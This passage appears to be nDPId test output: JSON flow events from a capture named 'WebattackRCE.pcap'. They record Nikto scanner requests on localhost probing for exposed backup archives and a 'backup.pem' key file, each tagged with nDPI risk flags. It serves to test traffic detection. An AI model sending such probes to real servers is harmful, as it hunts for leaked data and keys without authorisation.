(Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1576420276926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276926,"pkt":"AAAAAAAAAAAAAAAACABFAADIWd1AAEAG4lB\/AAABfwAAAcLSH5AL0mGV2bYy0oAYAED+vAAAAQEICp1m++adZvvmR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1576420276928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276928,"pkt":"AAAAAAAAAAAAAAAACABFAADIwcZAAEAGemd\/AAABfwAAAcLUH5BvVfmVJOeoY4AYAED+vAAAAQEICp1m++idZvvoR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1576420276929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276929,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/L19AAEAGDNh\/AAABfwAAAcLWH5BVghcOcLaACoAYAED+swAAAQEICp1m++mdZvvpR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1576420276932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276932,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/j\/RAAEAGrEJ\/AAABfwAAAcLYH5CKH7ek\/31EG4AYAED+swAAAQEICp1m++ydZvvsR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1576420276933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276933,"pkt":"AAAAAAAAAAAAAAAACABFAADFT2BAAEAG7NB\/AAABfwAAAcLaH5CU9HcQhzdjIYAYAED+uQAAAQEICp1m++2dZvvtR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1576420276934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276934,"pkt":"AAAAAAAAAAAAAAAACABFAADFqdVAAEAGklt\/AAABfwAAAcLcH5A055GDxax\/gIAYAED+uQAAAQEICp1m++6dZvvuR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1576420276936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276936,"pkt":"AAAAAAAAAAAAAAAACABFAADKdTNAAEAGxvh\/AAABfwAAAcLeH5C4Uk1kAkvbMoAYAED+vgAAAQEICp1m+++dZvvvR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1576420276937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276937,"pkt":"AAAAAAAAAAAAAAAACABFAADK9XZAAEAGRrV\/AAABfwAAAcLgH5B7eM0nuPdDlYAYAED+vgAAAQEICp1m+\/GdZvvxR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1576420276938,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276938,"pkt":"AAAAAAAAAAAAAAAACABFAADFaYFAAEAG0q9\/AAABfwAAAcLiH5DjU1EuPo0KHoAYAED+uQAAAQEICp1m+\/KdZvvyR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1576420276939,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276939,"pkt":"AAAAAAAAAAAAAAAACABFAADFJ3BAAEAGFMF\/AAABfwAAAcLkH5B8NB8+Bh651YAYAED+uQAAAQEICp1m+\/OdZvvzR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1576420276941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276941,"pkt":"AAAAAAAAAAAAAAAACABFAADCOKZAAEAGA45\/AAABfwAAAcLmH5ActAD4h3K22IAYAED+tgAAAQEICp1m+\/WdZvv1R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 